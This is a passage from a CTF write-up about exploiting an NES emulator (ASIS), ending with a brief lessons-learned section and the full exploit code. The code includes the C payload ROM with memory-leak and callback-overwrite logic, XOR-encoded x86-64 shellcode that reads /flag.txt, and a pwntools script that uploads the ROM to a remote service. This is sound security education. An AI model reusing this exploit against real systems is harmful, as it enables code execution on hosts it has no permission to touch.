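    return prgbank, chrbank

def max_chr_offset(value):
    # Largest index readCHR can compute after this bank-select write.
    _, chrbank = decode_bank_write(value)
    return chrbank * 0x2000 + 0x1FFF

print(decode_bank_write(0x10), hex(max_chr_offset(0xF0)))
```

Writing 0x10 selects chrbank 1 and leaves prgbank at 0, so the ROM keeps running from the same PRG bank while CHR reads move one bank past the start of the buffer.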
From there, I just had to calculate the offsets for the function pointer and the heap and change them.
Flag: ASIS{e8a46ded54d3acec15419e6b09818901}
Another good lesson in thinking about all possible attack patterns, instead of focusing on the first one I find.
Summary⌗
What I learned⌗
I learned a bit about how some addresses are considered special by CPUs and trigger bus reads and writes. This is something I want to dig into more, as it was cool to see it in action. I also learned a lot about the 6502 instruction set, which was surprisingly interesting. It’s crazy how much computers have improved over the last 40 years.
Most importantly, I learned to check for all possible reads and writes, instead of focusing only on what’s readily available. If I had spent more time looking at the PPU, I think I may have been able to find the OOB read. In reality, I hardly glanced at the Cartridge mappers during the competition.
Overall I really enjoyed the challenge, and it was also fun to continue working on it after the CTF had finished!
FULL CODE⌗
//pwn.c
#include <stdint.h>
extern void bka(uint8_t a);
extern void bkx(uint8_t a);
#define REMOTE
#define HEAP_LIBC_PAGE 0x4
#define HEAP_LIBC_OFF 0x1E50
#ifdef REMOTE
#define M_RAM_OFF 0x551f0
#define FUNC_OVERWRITE_OFF 0x3EB9D8
#endif
#ifndef REMOTE
#define M_RAM_OFF 0x553e0
#define FUNC_OVERWRITE_OFF 0x3FB108
#endif
#define DREAM_OFF 0xA2D60
#define LD_PAGE 0x1
#define LD_OFF 0x3f0
#define HEAP_OFF 0x3d0
#define RWX_OFF 0x3000
#define LIBC_OFF 0x217000
#define SYSTEM_OFF 0x28670
#define JOYCON_CB_RWX_DIFF 0x62D79
#define SHELLCODE_SZ 0x4a
#define SPRAY_CNT 3
enum IORegisters
{
PPUCTRL = 0x2000,
PPUMASK,
PPUSTATUS,
OAMADDR,
OAMDATA,
PPUSCROL,
PPUADDR,
PPUDATA,
OAMDMA = 0x4014,
PUTC = 0x4015,
JOY1 = 0x4016,
JOY2 = 0x4017,
};
/*[*] 0x30: 0x00007f69a1cdc3e8 0x00007ffe928407e0
[*] 0x40: 0x000000010000000b 0x0000000000000000
[*] 0x50: 0x00007ffe92840610 0x0000000000000000
[*] 0x60: 0x00007f69a1cb26b4 0x00007f69a1cb268d
*/
/*
0000000000000000 <_start>:
0: 48 31 d2 xor %rdx,%rdx
3: 48 31 c0 xor %rax,%rax
6: 48 31 f6 xor %rsi,%rsi
9: 48 bb 6c 6f 6c 6c 6f movabs $0x746c6c6f6c6c6f6c,%rbx
10: 6c 6c 74
13: 48 c1 eb 38 shr $0x38,%rbx
17: 53 push %rbx
18: 48 bb 2f 66 6c 61 67 movabs $0x78742e67616c662f,%rbx
1f: 2e 74 78
22: 53 push %rbx
23: 48 89 e7 mov %rsp,%rdi
26: b0 02 mov $0x2,%al
28: 0f 05 syscall
2a: 48 89 c7 mov %rax,%rdi
2d: 48 31 c0 xor %rax,%rax
30: 48 89 e6 mov %rsp,%rsi
33: ba 00 01 00 00 mov $0x100,%edx
38: 0f 05 syscall
3a: 48 89 c2 mov %rax,%rdx
3d: b8 01 00 00 00 mov $0x1,%eax
42: bf 01 00 00 00 mov $0x1,%edi
47: 0f 05 syscall
*/
//aligned to 0x10, necessary
uint8_t shellcode[] = { 0x90,
0x48,0x31,0xd2,0x48,0x31,0xc0,0x48,0x31,
0xf6,0x48,0xbb,0x6c,0x6f,0x6c,0x6c,0x6f,
0x6c,0x6c,0x74,0x48,0xc1,0xeb,0x38,0x53,
0x48,0xbb,0x2f,0x66,0x6c,0x61,0x67,0x2e,
0x74,0x78,0x53,0x48,0x89,0xe7,0xb0,0x02,
0x0f,0x05,0x48,0x89,0xc7,0x48,0x31,0xc0,
0x48,0x89,0xe6,0xba,0x00,0x01,0x00,0x00,
0x0f,0x05,0x48,0x89,0xc2,0xb8,0x01,0x00,
0x00,0x00,0xbf,0x01,0x00,0x00,0x00,0x0f,
0x05,0x00,0x00,0x00,0x00,0x00,0x00,};
uint8_t pattern[] = {0x64,0x4c,0x8b,0x1c,0x25,0x28,0xff,0xff,0xff,0x41,0xff,0xa3,0x18,0x3c,0x00,0x00}; //the bytes found in libc
void reset() {
//bka(0); bka(0); bka(0); bka(0);
bka(0); bka(0); bka(0); bka(0);
}
void sub64(uint32_t al, uint32_t ah, uint32_t bl, uint32_t bh,
uint32_t *xl, uint32_t *xh) {
*xl = al - bl;
if (al < bl) {
*xh = ah - bh - 1;
} else {
*xh = ah - bh;
}
}
void xorAt64(uint32_t ofs_low, uint32_t ofs_high, uint8_t value) {
int i;
for (i = 0; i < 4; i++) bka((ofs_high >> ((3-i)*8)) & 0xff);
for (i = 0; i < 4; i++) bka((ofs_low >> ((3-i)*8)) & 0xff);
bkx(value);
reset();
}
void xorAt(uint32_t offset, uint8_t value) {
int i;
for (i = 0; i < 4; i++) bka((offset >> ((3-i)*8)) & 0xff);
bkx(value);
reset();
}
void putchar(uint8_t c) {
*(uint8_t*)(0x4015) = c;
}
uint8_t get_data(uint16_t addr){
uint8_t a = (addr >> 8) & 0xff, b = addr &0xff;
*(uint8_t*)(PPUADDR) = a;
*(uint8_t*)(PPUADDR) = b;
return *(uint8_t*)PPUDATA;
}
//void set_ppu_data(uint8_t chef){
// *(uint8_t*)PPUDATA = chef;
//}
//
//uint8_t libc_addr[8];
void leak(uint16_t offset, uint32_t* high, uint32_t* low){
uint8_t i = 0;
get_data(0);
for(i = 0; i < 4; i++)
*low |= (uint32_t)get_data(offset+i+1)<<(i*8);
for(i = 0; i < 4; i++)
*high |= (uint32_t)get_data(offset+i+5)<<(i*8);
get_data(0);
}
void log64(uint32_t high, uint32_t low){
uint8_t i = 0;
putchar(0x46);
putchar(0x46);
for(i = 0; i < 4; i++)
putchar((low >> (i*8)) & 0xFF);
for(i = 0; i < 4; i++)
putchar((high >> (i*8)) & 0xFF);
putchar(0x41);
putchar(0x42);
putchar(0x43);
}
void dump(uint32_t base){
uint8_t i;
for(i = 0; i < 0xff; i++){
xorAt(base+i, 0);
}
xorAt(base+0xff, 0);
}
void debug(){
while(1) *(uint8_t*)JOY1 = 1;
}
void redemption(){
*(uint8_t*)0x9001 = 0x10;
}
int main(void) {
uint32_t rwx_low, rwx_high;
uint32_t mram_low, mram_high;
uint32_t mram_rwx_off_low, mram_rwx_off_high;
uint32_t joycon_cb_fn_low, overwrite;
uint8_t i,j;
//debug();
//xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
redemption();
rwx_low = rwx_high = 0;
leak(LD_OFF, &rwx_high, &rwx_low);
rwx_low -= RWX_OFF;
rwx_low &= 0xFFFFFF00;
mram_low = mram_high = 0;
leak(HEAP_OFF, &mram_high, &mram_low);
mram_low -= M_RAM_OFF; //set the heap leak to m_RAM
log64(rwx_high, rwx_low);
log64(mram_high, mram_low);
sub64(rwx_low, rwx_high, mram_low, mram_high, &mram_rwx_off_low, &mram_rwx_off_high);
log64(mram_rwx_off_high, mram_rwx_off_low);
//prep shellcode with the pattern found at rwx section
for(i = 0; i < SHELLCODE_SZ; i++)
shellcode[i] ^= pattern[i%0x10];
//create nop
for(i = 0; i < 0x10; i++)
pattern[i] ^= 0x90;
for(j = 0; j < SPRAY_CNT;j++){
for(i = 0; i < 0xb0; i++){
xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, pattern[i%0x10]);
}
mram_rwx_off_low+= 0xb0;
//write shellcode
for(i = 0; i < SHELLCODE_SZ; i++)
xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, shellcode[i]);
mram_rwx_off_low += 0x50;
}
mram_rwx_off_low -= SPRAY_CNT*0x100;
//for finding Mapper allocation on blind remote
#ifdef DUMP
putchar(0x44);
putchar(0x44);
for(i = 0; i < 8; i++)
dump(FUNC_OVERWRITE_OFF + i*0x100);
putchar(0x45);
putchar(0x45);
#endif
//overwrite callback function
overwrite = rwx_low;
joycon_cb_fn_low = rwx_low - JOYCON_CB_RWX_DIFF;
overwrite ^= joycon_cb_fn_low;
overwrite |= 0x800;
for(i = 0; i < 4; i++)
xorAt64(FUNC_OVERWRITE_OFF+i, 0, (overwrite >> (i*8)) & 0xFF);
putchar(0x47);
putchar(0x47);
putchar(0x47);
putchar(0x47);
putchar(0x47);
//trigger
*(uint8_t*)JOY1 = i;
while(1);
return 0;
}
;pwn_asm.s
.export _bka
.export _bkx
.export _nop
_bka:
.byte $13
rts
_bkx:
.byte $37
rts
_nop:
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
rts
;shellcode source (NASM syntax)
section .text
global _start
_start:
;rd_only
xor rdx, rdx
xor rax, rax
xor rsi, rsi
mov qword rbx, 'lollollt'
shr rbx, 0x38
push rbx
mov qword rbx, '/flag.tx'
push rbx
;filename now in rdi
mov rdi, rsp
mov al, 0x2
syscall
mov rdi, rax
xor rax, rax
mov rsi, rsp
mov rdx, 0x100
syscall
mov rdx, rax
mov rax, 1
;stdout
mov rdi, 1
syscall
#makefile
all:
cc65 -O -t c64 pwn.c
ca65 -t c64 pwn.s
ca65 -t c64 pwn_asm.s
cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o
#!/usr/bin/env python
#upload.py
from pwn import *
from binascii import hexlify
import os
stop = 0x3F3280
offset = 0x3A0000 #checked up to 0x100000 on remote
r = 0
def spawn_remote():
    global r
    #r = remote("91.107.157.58", 3000)
    r = remote("localhost", 1337)
def leak():
    data = r.recvuntil(b"FF", drop=True).decode("utf-8").strip()
    if data:
        print(data)
    data = r.recvuntil(b"ABC",drop=True)
    return u64(data)
def dump():
    i = 0
    print(r.recvuntil(b"DD",drop=True))
    temp = r.recvuntil(b"EE",drop=True)
    print(len(temp))
    data = b''
    #every leaked byte is followed by a "\r", so keep every other byte
    for i,b in enumerate(temp):
        if not i%2:
            data += b.to_bytes(1, 'little')
    i = 0
    print(len(data))
    while(i < 0x800):
        lol = u64(data[i:i+8])
        lol2 = u64(data[i+8:i+0x10])
        log.info(f'{hex(i+offset)}: {lol:#0{18}x} {lol2:#0{18}x}')
        if lol == 0x10000000b and lol2 == 0:
            raise SystemExit(1) #stop here: found the signature I was searching for
        i += 0x10
def templated(offset):
    log.info(f"offset: {hex(offset)}")
    pwn_code = ""
    with open("./rom/template.c", "r") as pwn:
        pwn_code = pwn.read()
    pwn_code = pwn_code.replace('XDOFFSET', f'{offset:#0{8}x}')
    with open("./rom/pwn.c", "w") as pwn:
        pwn.write(pwn_code)
def main():
    global r
    global offset
    #for remote enumeration
    #templated(offset)
    os.chdir("./rom")
    os.system("make all")
    os.chdir("..")
    spawn_remote()
    with open("./pwn.nes", "rb") as f:
        data = list(f.read())
        #patch in dream mapper
        data[6] = (data[6] & 0x0f) | (11 << 4)
        to_send = hexlify(bytes(data))
        #log.info(f"sending data> {to_send}")
        r.sendlineafter(':\n', to_send)
        with open("./test.nes", "wb") as out:
            out.write(bytes(data))
        f.close()
    #dump()
    data = leak()
    log.info(f'rwx: {hex(data)}')
    data = leak()
    log.info(f'm_RAM: {hex(data)}')
    data = leak()
    log.info(f'm_RAM_rwx_off: {hex(data)}')
    r.interactive()
    r.close()
    offset += 0x800
if __name__ == "__main__":
    main()
#r.sendlineafter(b'GGGGG','ls')